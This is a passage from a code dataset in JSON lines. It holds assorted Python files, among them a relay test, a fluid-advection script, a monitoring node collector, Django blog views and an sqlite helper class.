\"\"\"\n\ndef firstNotRepeatingCharacter(s):\n l ={}\n for x in s:\n if x not in l:\n l[x] = 1\n else:\n l[x] += 1\n for x in s:\n if l[x] == 1:\n return x\n # only fall back to '_' after scanning every character; returning inside the loop's else branch bailed out on the first repeated character\n return \"_\"\n\n\n# for c in s:\n# if s.index(c) == s.rindex(c):\n# return c\n# return '_'","sub_path":"interview-practice/arrays/firstNonRepeatingCharacter.py","file_name":"firstNonRepeatingCharacter.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"104405146","text":"\"\"\"Simple test class for testing relay.\"\"\"\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BCM)\npins = [2, 3, 4, 17]\nfor pin in pins:\n GPIO.setup(pin, GPIO.OUT)\n GPIO.output(pin, GPIO.HIGH)\nprint(\"All pins set to high\")\nwhile 1:\n inp = input(\"Enter pin number (2,3,4 or 17) and high or low: \")\n inpslit = inp.split(' ')\n to = GPIO.HIGH\n if inpslit[1] == 'low':\n to = GPIO.LOW\n GPIO.output(int(inpslit[0]), to)\n","sub_path":"relaytest.py","file_name":"relaytest.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"246356495","text":"from datetime import datetime\nimport os\nfrom pathlib import Path\n\nfrom tqdm import trange\nimport numpy as np\nfrom PIL import Image\nimport gc\n\ntry:\n from manta import *\nexcept ImportError:\n pass\n\nfrom collections import deque\nfrom perlin import TileableNoise\n\nfrom utils.smoke3_mov import args\n\n\ndef advect(v_path: Path):\n def get_param(p1):\n min_p1 = args.min_scenes\n max_p1 = args.max_scenes\n num_p1 = args.num_scenes\n p1_ = p1 / (num_p1 - 1) * (max_p1 - min_p1) + min_p1\n return p1_\n\n img_dir = os.path.join(args.log_dir, 'd_adv')\n vdb_dir = os.path.join(args.log_dir, 'd_vdb')\n\n if not os.path.exists(img_dir):\n os.makedirs(img_dir)\n\n if not os.path.exists(vdb_dir):\n os.makedirs(vdb_dir)\n\n # solver params\n res_x = args.resolution_x\n res_y = args.resolution_y\n res_z = args.resolution_z\n gs = vec3(res_x, res_y, res_z)\n\n dim = 2\n if res_z > 1: dim = 3\n s = Solver(name='main', gridSize=gs, dim=dim)\n s.timestep = args.time_step\n\n flags = s.create(FlagGrid)\n vel = s.create(MACGrid)\n density = s.create(RealGrid)\n\n flags.initDomain(boundaryWidth=args.bWidth)\n flags.fillGrid()\n setOpenBound(flags, args.bWidth, args.open_bound, FlagOutflow | FlagEmpty)\n\n vel.clear()\n density.clear()\n\n radius = gs.x * args.src_radius\n\n if (GUI):\n gui = Gui()\n gui.show(True)\n gui.nextVec3Display()\n gui.nextVec3Display()\n gui.nextVec3Display()\n # gui.pause()\n\n if res_z > 1:\n d_ = np.zeros([res_z, res_y, res_x], dtype=np.float32)\n else:\n d_ = np.zeros([res_y, res_x], dtype=np.float32)\n for t in trange(args.num_frames):\n v_path_ = v_path / f\"{t}.npz\"\n v_path_ = str(v_path_)\n with np.load(v_path_) as data:\n v = data['x']\n if res_z == 1:\n v = np.dstack((v, np.zeros([res_y, res_x, 1])))\n p = data['y']\n\n copyArrayToGridMAC(v, vel)\n\n nx = p[0, -1]\n nz = 0.5\n if res_z > 1: nz = p[1, -1]\n source = s.create(Sphere, center=gs * vec3(nx, args.src_y_pos, nz), radius=radius)\n source.applyToGrid(grid=density, value=1)\n advectSemiLagrange(flags=flags, vel=vel, grid=density, order=args.adv_order,\n openBounds=True, boundaryWidth=args.bWidth, clampMode=args.clamp_mode)\n\n copyGridToArrayReal(density, d_)\n\n img_path = os.path.join(img_dir, '%04d.png' % t)\n if res_z > 1:\n d_img = np.mean(d_[:, ::-1], axis=0) * 255\n else:\n d_img = d_[::-1] * 255\n d_img = np.stack((d_img, d_img, d_img), 
axis=-1).astype(np.uint8)\n d_img = Image.fromarray(d_img)\n d_img.save(img_path)\n\n # save as vdb file\n vdb_file_path = os.path.join(vdb_dir, f'{t:04}.vdb')\n density.save(vdb_file_path)\n\n s.step()\n\n\nif __name__ == '__main__':\n velocity_field = Path(\"/Users/vivanov/Projects/deep-fluids/experiments/Autoencoder/velocity_field/\")\n advect(velocity_field)\n","sub_path":"scene/smoke3_mov_advect.py","file_name":"smoke3_mov_advect.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"248586920","text":"import asyncio\nimport json\n\nfrom prometheus_client import Info\n\nfrom dadvisor.config import IP, PROXY_PORT, IS_SUPER_NODE\nfrom dadvisor.datatypes.node import Node\nfrom dadvisor.log import log\nfrom dadvisor.nodes.node_actions import register_node, remove_node, get_node_info, get_all_nodes, get_machine_info\n\nFILENAME = '/prometheus.json'\nSLEEP_TIME = 60\n\nCHECK_REMOVE = 10\n\nNODE_INFO = Info('node', 'Nodes', ['host'])\n\n\nclass NodeCollector(object):\n \"\"\"\n Collect information about other nodes. The dAdvisor needs to be fully connected, as it needs to communicate with\n other nodes if it detects a dataflow between its own peer and a remote peer.\n \"\"\"\n\n def __init__(self, loop):\n self.loop = loop\n self.running = True\n self.my_node = Node(IP, PROXY_PORT, IS_SUPER_NODE)\n self.other_nodes = []\n self.set_scraper([])\n self.check_removal_counter = 0\n self.my_node_stats = {}\n\n async def set_my_node_stats(self):\n num_cores, memory = await get_machine_info()\n self.my_node_stats = {\n 'num_cores': num_cores,\n 'memory': memory\n }\n self.set_node_info(self.my_node, self.my_node_stats)\n\n @staticmethod\n def set_node_info(node: Node, data):\n NODE_INFO.labels(host=node.ip).info({\n 'port': str(node.port),\n 'num_cores': str(data['num_cores']),\n 'memory': str(data['memory']),\n 'is_super_node': str(node.is_super_node)})\n\n async def run(self):\n \"\"\"\n This run method performs the following two actions:\n 1. register this peer in the tracker\n 2. 
continuously perform the following actions:\n - validate other nodes\n :return:\n \"\"\"\n register_node(self.loop, self.my_node)\n\n while self.running:\n try:\n await asyncio.sleep(SLEEP_TIME)\n self.loop.create_task(self.add_nodes(await get_all_nodes()))\n self.check_removal_counter += 1\n if self.check_removal_counter == CHECK_REMOVE:\n self.check_removal_counter = 0\n self.loop.create_task(self.check_nodes())\n except Exception as e:\n log.error(e)\n\n @property\n def nodes(self):\n return [self.my_node] + self.other_nodes\n\n def is_other_node(self, ip):\n for node in self.other_nodes:\n if node.ip == ip:\n return node\n return None\n\n async def add_nodes(self, data_list):\n new_nodes = []\n found_my_node = False\n for node_json in data_list['list']:\n node_data = node_json['node']\n node = Node(node_data['ip'], int(node_data['port']), node_data['is_super_node'])\n\n if node == self.my_node:\n found_my_node = True\n elif node not in self.other_nodes:\n self.set_node_info(node, await get_node_info(node))\n new_nodes.append(node)\n\n if not found_my_node:\n register_node(self.loop, self.my_node)\n self.other_nodes += new_nodes\n\n async def check_nodes(self):\n \"\"\" Removes the nodes that cannot be reached \"\"\"\n remove_nodes = []\n for node in self.other_nodes:\n info = await get_node_info(node)\n if not info:\n remove_nodes.append(node)\n for node in remove_nodes:\n self.other_nodes.remove(node)\n\n @staticmethod\n def set_scraper(nodes):\n \"\"\" Set a line with federation information. Prometheus is configured in\n such a way that it reads this file. \"\"\"\n try:\n with open(FILENAME, 'r') as file:\n old_data = file.read()\n except FileNotFoundError:\n old_data = ''\n\n node_list = [f'localhost:{PROXY_PORT}']\n for node in nodes:\n node_list.append('{}:{}'.format(node.ip, node.port))\n\n data = [{\"labels\": {\"job\": \"dadvisor\"}, \"targets\": node_list}]\n new_data = json.dumps(data) + '\\n'\n log.debug(new_data)\n\n if old_data != new_data:\n with open(FILENAME, 'w') as file:\n file.write(new_data)\n\n async def stop(self):\n self.running = False\n remove_node(self.loop, self.my_node)\n","sub_path":"dadvisor/nodes/node_collector.py","file_name":"node_collector.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"209488588","text":"#import\nimport random\n\n#code\n\nclass Cube():\n \"\"\"Classe definissant un cube caracterise par :\n - ses coordonnees, x, y, z\n - sa largueur\n - sa longueur\n - sa hauteur\"\"\"\n\n def __init__(self, x, y, z, larg, long, haut):\n \"\"\"constructeur de la classe cube\n\n exemple de creation d'un cube : c1 = Cube(0,0,0,10,10,10)\n (creation d'un cube de coordonnees x = y = z = 0 et de taille 10\n \"\"\"\n self.x = x\n self.y = y\n self.z = z\n self.larg = larg\n self.long = long\n self.haut = haut\n\n \n def safficher(self):\n \"\"\"Methode d'affichage d'un cube au format :\n cube[x= , y= , z= , larg= , long= , haut= ]\n \"\"\"\n print(\"Cube(x=\",self.x,\",y=\",self.y,\",z=\",self.z,\", larg=\",self.larg,\",long=\",self.long,\",haut=\",self.haut,\")\")\n\n\n def getPos(self):\n \"\"\"return la position du cube sous forme d'un triplet -> (x, y, z)\"\"\"\n return self.x, self.y, self.z\n\n def toSaveF(self, f):\n \"\"\"Ecrit les coordonnees du cube dans le fichier ouvert passe en argument, avec ';' comme separation\"\"\"\n f.write('Cube;' + str(self.x) + ';' + str(self.y) + ';' + str(self.z) + ';' + str(self.larg) + ';' + str(self.long) + ';' + 
str(self.haut) + ';\\n' )\n\n\ndef Creation_Cube(arene):\n \"\"\"Creation d'un cube de taille et coordonnees aleatoires\"\"\"\n x = random.randint(0,arene.lx)\n y = random.randint(0,arene.ly)\n z = random.randint(0,arene.lz)\n \n larg = random.randint(50,70)\n long = random.randint(50,70)\n haut = random.randint(50,70)\n \n return Cube(x, y, z, larg, long, haut)\n\n#constructeur temporaire necessaire a tkinter (affichage graphique)\ndef Creation_Cube_xy(x, y, arene):\n \"\"\"Creation d'un cube de taille aleatoire\"\"\"\n x = x\n y = y\n z = random.randint(0, arene.lz)\n\n larg = random.randint(30, 100)\n long = random.randint(30, 100)\n haut = random.randint(30, 100)\n\n return Cube(x, y, z, larg, long, haut)\n","sub_path":"simulation/basiques/cube.py","file_name":"cube.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"621144377","text":"#!/usr/bin/env python3\n\n#recording\nbob = {'name':'Bob Smith', 'age':'42','pay':'30000','job':'dev'}\nsue = dict(name='Sue Jones',age='45',pay='40000',job='hdw')\nnames = ['name','age','pay','job']\nvalues = ['Tom','50','0',None]\ntom = dict(zip(names,values))\n\n\ndb = {}\ndb['bob'] = bob\ndb['sue'] = sue\ndb['tom'] = tom\n\nif __name__ == '__main__':\n for key in db:\n print(key,'=>\\n',db[key])\n","sub_path":"initdata.py","file_name":"initdata.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"134037906","text":"class FindPayments(object):\n def __init__(self, Fetch, today):\n self.Fetch = Fetch\n self.today = today\n\n def get_payments(self, user_id):\n current_year, current_month = self.today.get_year(), self.today.get_month()\n current_payments = self.Fetch.fetch_by_month(user_id, current_year, \n current_month)\n \n previous_month = current_month - 1 if current_month != 1 else 12\n previous_month_year = current_year if current_month != 1 else current_year - 1\n \n past_payments = self.Fetch.fetch_by_month(user_id, previous_month_year, \n previous_month)\n \n return (current_payments, past_payments)\n\n ","sub_path":"app/unusual_spending/find_payments.py","file_name":"find_payments.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"349343316","text":"# -*- coding: utf-8 -*-\nimport re\nfrom html import *\n\nREGEX_LINE = re.compile('(((\\d{4})(\\d)(\\d{2})(\\d{4}))\\s(\\d+\\.\\d+\\.\\d+-\\d+))')\n\ntable = '''\n\n\n \n \n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n'''\n\n\ntransporte = open('txt/transporte.txt', 'r')\ntransporte_intermunicipal = open('txt/transporte-intermunicipal.txt', 'r')\nalimentacao = open('txt/alimentacao.txt', 'r')\nmoradia = open('txt/moradia.txt', 'r')\n\n# CPFS\nresultado = {}\n\n\ndef write(data=None, nome=None):\n for line in data:\n parsed = REGEX_LINE.findall(line)\n if len(parsed) > 0:\n # 0 all 1 mat 2 year 3 peri 4 curso 5 cod 6 cpf\n if resultado.get(parsed[0][1]):\n resultado[parsed[0][1]].update(\n {\n nome: \"Sim\",\n 'matricula': parsed[0][1],\n 'ano': parsed[0][2],\n 'periodo': parsed[0][3],\n 'curso': parsed[0][4],\n 'cpf': parsed[0][6],\n 'nome': 'Sem nome'\n }\n )\n else:\n resultado[parsed[0][1]] = {\n nome: \"Sim\",\n 'matricula': parsed[0][1],\n 'ano': parsed[0][2],\n 'periodo': parsed[0][3],\n 'curso': parsed[0][4],\n 'cpf': parsed[0][6],\n 'nome': 'Sem nome'\n }\n\nwrite(moradia, 'moradia')\nwrite(transporte, 
'transporte')\nwrite(transporte_intermunicipal, 'transportei')\nwrite(alimentacao, 'alimentacao')\n\nfor a in resultado:\n aluno = resultado[a]\n table += dict_to_html(aluno)\n\n\nhtml_file = open('v2.html', 'w')\nhtml_file.write(table)\nhtml_file.write('''\n \n \n''')\n","sub_path":"v2.py","file_name":"v2.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"393734542","text":"from math import ceil, floor\nfrom typing import Tuple, List\n\nimport numpy as np\nimport pandas as pd\nfrom numpy import ndarray\nfrom pandas import DataFrame, Series\nfrom sklearn.model_selection import train_test_split\n\nTrainTestVectors = Tuple[ndarray, ndarray, ndarray, ndarray]\nTrainVectors = [TrainTestVectors, Tuple[ndarray, ndarray]]\n\n\nclass sequences:\n \"\"\"\n From a dataframe with four categories (OHLC) in a multivariate timeseries,\n aggrupate it in timesteps windows, split it in training and testing subsets,\n and finally, aggrupate X and y values together.\n\n Consider a given multi-variate sequence (num_categories = 3):\n\n [[ 10 15 25]\n [ 20 25 45]\n [ 30 35 65]\n [ 40 45 85]\n [ 50 55 105]\n ...\n ]\n\n We can divide the sequence into multiple input/output patterns called\n samples, where three time steps are used as input and one time step is\n used as output for the one-step prediction that is being learned.\n\n X, y_3\n --------------------\n [10, 15, 25\n 20, 25, 45\n 30, 35, 65] 85\n [20, 25, 45\n 30, 35, 65\n 40, 45, 85] 105\n ...\n\n In this example we consider timesteps=3, so X is composed of\n [ timesteps x num_categories ] samples, and y is the third column of\n the next sample.\n\n \"\"\"\n\n def __init__(self):\n pass\n\n @classmethod\n def to_time_windows(\n cls,\n df: DataFrame,\n train_columns: List[str],\n y_label: str,\n timesteps: int,\n test_size: float = 0.1\n ) -> TrainVectors:\n \"\"\"\n Prepare the input dataframe (OHLC) converting it into an ndarray\n of (num_samples x timesteps x num_categories), also splitting it\n into training and test sets.\n \"\"\"\n X_indices, y_index = cls._get_indices(df, train_columns, y_label)\n df = cls._aggrupate_in_timesteps(df.values, timesteps)\n if test_size != 0.0:\n train, test = train_test_split(\n df,\n test_size=test_size,\n shuffle=False)\n X_train, y_train = cls._split(train, X_indices, y_index, timesteps)\n X_test, y_test = cls._split(test, X_indices, y_index, timesteps)\n return X_train, y_train, X_test, y_test\n\n return cls._split(df.values, X_indices, y_index, timesteps)\n\n @classmethod\n def _aggrupate_in_timesteps(cls, data: ndarray,\n timesteps: int) -> DataFrame:\n \"\"\"\n Given a dataframe, divide the sequence into multiple input/output\n patterns called samples, where a number of time steps are used as\n input and one time step is used as output for the one-step prediction\n that is being learned.\n \"\"\"\n df = pd.DataFrame(data)\n series = df.copy(deep=True)\n series_s = series.copy(deep=True)\n for i in range(timesteps):\n series = pd.concat([series, series_s.shift(-(i + 1))], axis=1)\n series.dropna(axis=0, inplace=True)\n return series\n\n @classmethod\n def _get_indices(\n cls,\n df: DataFrame,\n train_columns: List[str],\n y_label: str) -> Tuple[List[int], int]:\n\n X_indices = [df.columns.get_loc(col_name) for col_name in train_columns]\n y_index = df.columns.get_loc(y_label)\n return X_indices, y_index\n\n @classmethod\n def _split(\n cls,\n data: ndarray,\n X_indices: List[int],\n y_index: int,\n timesteps: 
int) -> TrainVectors:\n \"\"\"\n Take num_samples from data, and separate X and y from it into two\n new tensors that will be used to feed the LSTM.\n \"\"\"\n num_samples = data.shape[0]\n num_categories = int(data.shape[1] / (timesteps + 1))\n subset = np.array(data).reshape(\n (num_samples, timesteps + 1, num_categories))\n\n X = subset[:, 0:timesteps, X_indices]\n y = subset[:, -1, y_index]\n\n if len(y.shape) == 1:\n y = y.reshape(-1, 1)\n return X, y\n\n @classmethod\n def get_num_features(cls, X_train):\n assert len(X_train.shape) == 3, \"Training set must be a 3D tensor\"\n return X_train.shape[2]\n\n @classmethod\n def get_num_target_labels(cls, y_train):\n assert len(y_train.shape) == 2, \"Training labels must be a 2D tensor\"\n return y_train.shape[1]\n\n @classmethod\n def _last_index_in_training(\n cls, df: DataFrame, timesteps: int, test_size: float = 0.1\n ) -> int:\n \"\"\"Returns the last value in the training set, from the original\n dataframe\"\"\"\n train_size = 1.0 - test_size\n n_samples = df.shape[0]\n n_test = ceil(test_size * n_samples)\n n_train = floor(train_size * n_samples)\n last_index_in_train = n_train - timesteps - 1\n return last_index_in_train\n\n @classmethod\n def last_in_training(\n cls, df: DataFrame, timesteps: int, test_size: float = 0.1\n ) -> Series:\n return df.iloc[\n cls._last_index_in_training(df, timesteps, test_size)]\n\n @classmethod\n def first_in_test(\n cls, df: DataFrame, timesteps: int, test_size: float = 0.1\n ) -> Series:\n return df.iloc[\n cls._last_index_in_training(df, timesteps, test_size) + 1\n ]\n\n @classmethod\n def previous_to_first_prediction(cls, df: DataFrame, timesteps: int\n ) -> Series:\n return df.iloc[timesteps - 1]\n","sub_path":"src/predictor/sequences.py","file_name":"sequences.py","file_ext":"py","file_size_in_byte":5626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"218589233","text":"import random\n\nfrom django.core.paginator import Paginator\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\n\nfrom back.forms import ArticlesForm, AddColumnForm, UpdateColumnForm\nfrom back.models import Articles, Column\nfrom user.models import User\n\n\ndef index(request):\n user = User.objects.get(pk=4)\n return render(request, 'back/index.html', {'user': user})\n\n\ndef articles(request):\n if request.method == 'GET':\n page = int(request.GET.get('page', 1))\n all_articles = Articles.objects.filter(is_delete=0)\n count = len(all_articles)\n articles = []\n for article in all_articles:\n column = Column.objects.get(id=article.a_column_id)\n name = column.column_name\n articles.append([article, name])\n pg = Paginator(articles, 8)\n articles = pg.page(page)\n return render(request, 'back/article.html', {'articles': articles, 'count': count})\n\n\ndef add_article(request):\n if request.method == 'GET':\n user = User.objects.get(pk=4)\n first_level = Column.objects.filter(pid_id=None)\n column_list = []\n for item in first_level:\n secone_level = Column.objects.filter(pid_id=item.id)\n data = [item, secone_level]\n column_list.append(data)\n return render(request, 'back/add_article.html', {'user': user, 'column_list': column_list})\n if request.method == 'POST':\n # 获取表单提交数据,并保存到数据库,跳转文章界面\n article = ArticlesForm(request.POST, request.FILES)\n if article.is_valid():\n title = article.cleaned_data['title']\n content = article.cleaned_data['content']\n keywords = article.cleaned_data['keywords']\n describe 
= article.cleaned_data['describe']\n tags = article.cleaned_data['tags']\n # image = article.cleaned_data['image']\n is_public = article.cleaned_data['is_public']\n a_column_id = int(article.cleaned_data['category'])\n image = str(random.randint(1, 14)) + '.jpg'\n Articles.objects.create(title=title,\n content=content,\n keywords=keywords,\n describe=describe,\n tags=tags,\n image=image,\n is_public=is_public,\n a_column_id=a_column_id)\n return HttpResponseRedirect(reverse('back:articles'))\n else:\n errors = article.errors\n return render(request, 'back/add_article.html', {'errors': errors})\n\n\ndef del_article(request, id):\n if request.method == 'GET':\n article = Articles.objects.filter(pk=id).first()\n article.is_delete = 1\n article.save()\n return HttpResponseRedirect(reverse('back:articles'))\n\n\ndef update_article(request, id):\n if request.method == 'GET':\n first_level = Column.objects.filter(pid_id=None)\n column_list = []\n for item in first_level:\n secone_level = Column.objects.filter(pid_id=item.id)\n data = [item, secone_level]\n column_list.append(data)\n article = Articles.objects.filter(pk=id).first()\n return render(request, 'back/update_article.html', {'article': article, 'column_list': column_list})\n if request.method == 'POST':\n # 获取表单提交修改后的数据,并保存到数据库,跳��文章界面\n article = ArticlesForm(request.POST, request.FILES)\n if article.is_valid():\n title = article.cleaned_data['title']\n content = article.cleaned_data['content']\n keywords = article.cleaned_data['keywords']\n describe = article.cleaned_data['describe']\n tags = article.cleaned_data['tags']\n # image = article.cleaned_data['image']\n image = str(random.randint(1, 14)) + '.jpg'\n is_public = article.cleaned_data['is_public']\n a_column_id = article.cleaned_data['category']\n # 更新文章数据\n Articles.objects.filter(pk=id).update(title=title,\n content=content,\n keywords=keywords,\n describe=describe,\n tags=tags,\n image=image,\n is_public=is_public,\n a_column_id=a_column_id)\n return HttpResponseRedirect(reverse('back:articles'))\n else:\n errors = article.errors\n return render(request, 'back/update_article.html', {'errors': errors})\n\n\ndef category(request):\n if request.method == 'GET':\n columns = Column.objects.all()\n column_count = len(columns)\n return render(request, 'back/category.html', {'columns': columns, 'column_count': column_count})\n if request.method == 'POST':\n # 获取表单提交修改后的数据,并保存到数据库,跳转栏目界面\n column = AddColumnForm(request.POST, request.FILES)\n if column.is_valid():\n column_name = column.cleaned_data['name']\n another_name = column.cleaned_data['alias']\n c_describe = column.cleaned_data['describe']\n c_keywords = column.cleaned_data['keywords']\n pid_id = column.cleaned_data.get('fid', None)\n # 更新文章数据\n Column.objects.create(column_name=column_name,\n another_name=another_name,\n c_describe=c_describe,\n c_keywords=c_keywords,\n pid_id=pid_id)\n return HttpResponseRedirect(reverse('back:category'))\n\n\ndef del_category(request, id):\n if request.method == 'GET':\n Column.objects.filter(pk=id).delete()\n return HttpResponseRedirect(reverse('back:category'))\n\n\ndef update_category(request, id):\n if request.method == 'GET':\n columns = Column.objects.all()\n del_column = Column.objects.get(pk=id)\n return render(request, 'back/update_category.html', {'columns': columns, 'del_column': del_column})\n if request.method == 'POST':\n # 获取表单提交修改后的数据,并保存到数据库,跳转文章界面\n column = UpdateColumnForm(request.POST, request.FILES)\n if column.is_valid():\n column_name = column.cleaned_data['name']\n 
another_name = column.cleaned_data['alias']\n c_describe = column.cleaned_data['describe']\n c_keywords = column.cleaned_data['keywords']\n pid_id = column.cleaned_data.get('fid', None)\n # 更新文章数据\n Column.objects.filter(pk=id).update(column_name=column_name,\n another_name=another_name,\n c_describe=c_describe,\n c_keywords=c_keywords,\n pid_id=pid_id)\n return HttpResponseRedirect(reverse('back:category'))\n else:\n errors = column.errors\n return render(request, 'back/update_article.html', {'errors': errors})\n","sub_path":"myblog/back/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"648774329","text":"# -*- coding: utf-8 -*-\r\n#__Author__= allisnone #2019-02-16\r\n#https://docs.python.org/3/library/sqlite3.html\r\n#https://www.sqlite.org/index.html\r\nimport sqlite3\r\nimport os\r\n\r\nclass Mysqlite():\r\n def __init__(self,db_path='',memory=False):\r\n self.connect = None\r\n self.cursor = None\r\n self.create_sqlite(db_path,memory)\r\n \r\n def create_sqlite(self, path='',memory=False):\r\n conn = None\r\n if not memory:\r\n self.connect = sqlite3.connect(path)\r\n else:\r\n self.connect = sqlite3.connect(':memory:')\r\n self.cursor = self.connect.cursor()\r\n \r\n def close(self):\r\n self.cursor.close()\r\n self.connect.close()\r\n \r\n def _join_str(self,fields, default='',specify=','):\r\n \"\"\"\r\n 把list或者tuple转化为str, 以逗号或者其他特殊字符连接\r\n \"\"\"\r\n re = default\r\n if fields:\r\n if isinstance(fields,str):\r\n re = fields\r\n elif isinstance(fields, list) or isinstance(fields, tuple):\r\n re = specify.join(fields)\r\n else:\r\n pass\r\n return re\r\n \r\n def create_table(self,table,columns=[]):\r\n \"\"\"\r\n 创建table:\r\n table: str, table name\r\n columns: table 列的列表或者tuple,保护sql的数据类型\r\n \"\"\"\r\n #con.execute(\"create table person (id integer primary key, firstname varchar unique)\")\r\n #cursor.execute(sql,{'st_name':name, 'st_username':username, 'id_num':id_num})\r\n #columns = ('id integer primary key', 'firstname varchar unique')\r\n sql = \"create table %s (%s);\" % (table,self._join_str(columns))\r\n try:\r\n self.cursor.execute(sql)\r\n self.connect.commit()\r\n except Exception as e:\r\n print('create_table Exception: ',e)\r\n return \r\n \r\n def get_table(self,table, fields='',where={'firsname':'b'}): \r\n \"\"\"\r\n 获取table的所有数据\r\n table: str\r\n fields: select 的列\r\n where: 过滤条件,只支持=\r\n \"\"\"\r\n sql = \"select %s from %s\" % (self._join_str(fields,'*'),table)\r\n a = ';'\r\n if where:\r\n a = ' where '+ ' '.join(['%s=\"%s\"'%(k,v) for k,v in where.items()]) + ';'\r\n try: \r\n print('sql=',sql+a)\r\n results = self.cursor.execute(sql+a)# 遍历打印输出\r\n datas = results.fetchall()\r\n return datas\r\n except Exception as e:\r\n print('get_table Exception: ',e)\r\n #self.cursor.close()\r\n return []\r\n \r\n def drop_table(self,table):\r\n sql = 'DROP TABLE IF EXISTS ' + table\r\n try:\r\n self.cursor.execute(sql)\r\n self.connect.commit()\r\n return 1\r\n except Exception as e:\r\n print('drop_table Exception: ',e)\r\n return 0\r\n \r\n def insert(self,table,datas):\r\n \"\"\"\r\n table: str, table name\r\n datas: list, each element will be tuple type\r\n \"\"\"\r\n if isinstance(datas,list) or isinstance(datas,tuple):\r\n pass\r\n else:\r\n return \r\n col_count = len(datas[0])\r\n col_str = ','.join(['?']*col_count)\r\n sql = 'INSERT INTO %s VALUES (%s)' % (table, col_str)\r\n try:\r\n self.cursor.executemany(sql,datas)\r\n 
self.connect.commit()\r\n return 1\r\n except Exception as e:\r\n print('insert Exception: ',e)\r\n #cursor.execute(sql,{'st_name':name, 'st_username':username, 'id_num':id_num})\r\n return 0\r\n \r\n def update(self,table,field,where=[], datas=[]):\r\n \"\"\"\r\n Update a specific field.\r\n table: str\r\n field: the column to update\r\n where: filter condition, list of column names\r\n datas: tuples of (new value, condition value 1, condition value 2, ...); conditions are ANDed\r\n \"\"\"\r\n # AND-join multi-column conditions, as the docstring promises\r\n where_str = self._join_str(where, default='',specify='=? AND ') + '=?;'\r\n update_sql = 'UPDATE %s SET %s=? ' % (table,field) + ' where ' + where_str\r\n #print('update_sql=',update_sql)\r\n try:\r\n self.cursor.executemany(update_sql,datas)\r\n self.connect.commit()\r\n return 1\r\n except Exception as e:\r\n print('update Exception: ',e)\r\n return 0\r\n \r\n def delete(self,table,where=[], datas=[]):\r\n \"\"\"\r\n Delete rows.\r\n table: str\r\n where: filter condition, a list of column names; when where is empty, all rows are deleted\r\n datas: tuples of condition values, (condition value 1, condition value 2, ...); conditions are ANDed\r\n \"\"\"\r\n #delete_sql = 'DELETE FROM student WHERE NAME = ? AND ID = ? '\r\n where_str = self._join_str(where, default='',specify='=? AND ') + '=?;'\r\n delete_sql = 'DELETE FROM %s' % table + ' where ' + where_str\r\n try:\r\n if where:\r\n self.cursor.executemany(delete_sql,datas)\r\n else:\r\n # empty where deletes every row, as documented (the original branches were inverted)\r\n self.cursor.execute('DELETE FROM %s' % table)\r\n self.connect.commit()\r\n return 1\r\n except Exception as e:\r\n print('delete Exception: ',e)\r\n return 0\r\n \r\n def execute_script(self,sql):\r\n \"\"\"\r\n create table person(\r\n firstname,\r\n lastname,\r\n age\r\n );\r\n \r\n create table book(\r\n title,\r\n author,\r\n published\r\n );\r\n CREATE TABLE `student`(\r\n `id` int(11) NOT NULL,\r\n `name` varchar(20) NOT NULL,\r\n `gender` varchar(4) DEFAULT NULL,\r\n `age` int(11) DEFAULT NULL,\r\n `address` varchar(200) DEFAULT NULL,\r\n `phone` varchar(20) DEFAULT NULL,\r\n PRIMARY KEY (`id`)\r\n );\r\n insert into book(title, author, published)\r\n values (\r\n 'Dirk Gently''s Holistic Detective Agency',\r\n 'Douglas Adams',\r\n 1987\r\n );\r\n \"\"\"\r\n try:\r\n self.cursor.executescript(sql)\r\n self.connect.commit()\r\n return 1\r\n except Exception as e:\r\n print('execute_script Exception: ',e)\r\n return 0\r\n \r\n def backup(self,new='backup.db'):\r\n #sqlite3 >=3.7\r\n def progress(status, remaining, total):\r\n print(f'Copied {total-remaining} of {total} pages...')\r\n return\r\n with sqlite3.connect(new) as bck:\r\n self.connect.backup(bck, pages=1, progress=progress)\r\n return\r\n \r\nif __name__ == '__main__':\r\n sql3 = Mysqlite(db_path='test.db',memory=False)\r\n columns = ('id integer primary key', 'firstname varchar unique')\r\n sql3.create_table('table1', columns)\r\n sql3.create_table('person', columns)\r\n datas1 = [(1,'a'),(2,'b'),(3,'c')]\r\n datas2 = [(1,'e'),(2,'f'),(3,'g')]\r\n sql3.insert('table1', datas1)\r\n table1_data = sql3.get_table(table='table1', fields='', where={'firstname':'b'})\r\n print('table1_data=',table1_data)\r\n sql3.insert('person', datas2)\r\n table2_data = sql3.get_table(table='person', fields='', where='')\r\n print('table2_data=',table2_data)\r\n sql3.update(table='person',field='firstname',where=['id'], datas=[('h',2)])\r\n table2_data1 = sql3.get_table(table='person', fields='', where='')\r\n print('table2_data1=',table2_data1)\r\n #sql3.drop_table('table1')\r\n #sql3.backup('new.db')\r\n sql3.close()","sub_path":"trademodel/mysqlite.py","file_name":"mysqlite.py","file_ext":"py","file_size_in_byte":7433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"359131108","text":"#!/usr/bin/env python3\n\nimport 
